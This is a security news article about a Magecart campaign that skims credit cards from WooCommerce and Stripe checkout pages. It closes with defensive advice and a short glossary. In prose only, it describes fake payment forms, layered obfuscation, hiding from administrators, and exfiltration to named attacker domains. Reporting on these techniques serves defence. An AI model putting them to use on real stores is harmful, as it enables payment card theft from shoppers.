Checkout, Cash Out: Inside the Stealthy Magecart Heist Targeting Online Shoppers Worldwide

The digital checkout line is supposed to be where shopping journeys end in satisfaction. But for hundreds of online stores and their unsuspecting customers, it’s become the scene of a silent cybercrime. Since early 2022, a sophisticated Magecart group has been quietly looting credit card data from e-commerce sites, using fake payment forms so convincing even the wary have been fooled. The attackers’ weapon of choice? A malicious script that blends seamlessly with trusted checkout pages - until your money, and your trust, are gone.

Fast Facts

• Magecart attackers are stealing credit card data from e-commerce checkout pages via fake payment forms.
• The campaign targets WooCommerce sites using Stripe, affecting major card brands like Mastercard, Amex, and JCB.
• Attackers use advanced obfuscation and anti-detection techniques, including hiding from site administrators.
• Stolen data is exfiltrated to remote servers, often after a fake payment error prompts users to re-enter details.
• Experts urge tighter controls: CSPs, regular updates, strong authentication, and non-admin testing of checkout flows.

The Anatomy of a Digital Heist

This latest Magecart campaign is as insidious as it is clever. By injecting malicious JavaScript into the checkout pages of WooCommerce-powered stores, the attackers replace legitimate payment forms - specifically those using the Stripe gateway - with a fake, pixel-perfect replica. The fraudulent form automatically detects card brands, displays the correct logos, and even mimics Stripe’s validation features, making it nearly indistinguishable from the real thing.

When a shopper enters their payment information, the skimmer intercepts the data before it ever reaches the real payment processor. The stolen card details are then sent to an attacker-controlled server, such as Lasorie.com, before the malicious code wipes its tracks and reloads the genuine form. To sow further confusion, the victim is often met with a payment error, nudging them to try again - doubling the attackers’ haul.

The operation employs a suite of technical tricks to avoid discovery. The JavaScript is hidden behind layers of obfuscation, including string concatenation, base64 encoding, and even XOR encryption with a hardcoded key. The code leverages deep knowledge of WordPress and WooCommerce internals, using the wp_enqueue_scripts function to slip into the site’s workflow. It also checks for the presence of the WordPress Admin Bar, removing itself if an administrator is detected - ensuring it remains invisible during routine site maintenance.

While the attackers have left digital breadcrumbs - such as domains like cdn-cookie[.]com and other Magecart-linked infrastructure - security researchers say the campaign’s persistence and adaptability set it apart. Some infected sites have even displayed visible bugs, a rare crack in an otherwise polished operation.

Defending the Checkout Lane

The fallout is far-reaching: online shoppers face direct financial loss and risk of fraud, while businesses must grapple with reputational damage and regulatory penalties. Experts recommend e-commerce administrators deploy robust Content Security Policies (CSP) to block unauthorized JavaScript, keep all platforms and plugins up to date, enforce multi-factor authentication, and - crucially - test checkout processes from the perspective of ordinary users, not just administrators. Silent Push researchers note that unexplained payment errors and suspicious checkout behavior may be early warning signs of compromise.

The New Normal?

The Magecart threat is not new, but it is evolving - constantly raising the bar for both attackers and defenders. As online shopping continues to surge, so too does the digital arms race at the checkout. In this game, vigilance is the only safe bet.

WIKICROOK

• Magecart: Magecart is a group of hackers who inject malicious code into online checkout pages to steal customers’ credit card information during transactions.
• Obfuscation: Obfuscation is the practice of disguising code or data to make it difficult for humans or security tools to understand, analyze, or detect.
• Content Security Policy (CSP): Content Security Policy (CSP) is a set of website rules that controls what content can load, helping block malicious scripts and unauthorized elements.
• WooCommerce: WooCommerce is a popular WordPress plugin that enables users to add customizable e-commerce features and sell products directly from their websites.
• Skimmer: A skimmer is a device or software that secretly captures payment card details during legitimate transactions, often used by criminals for fraud.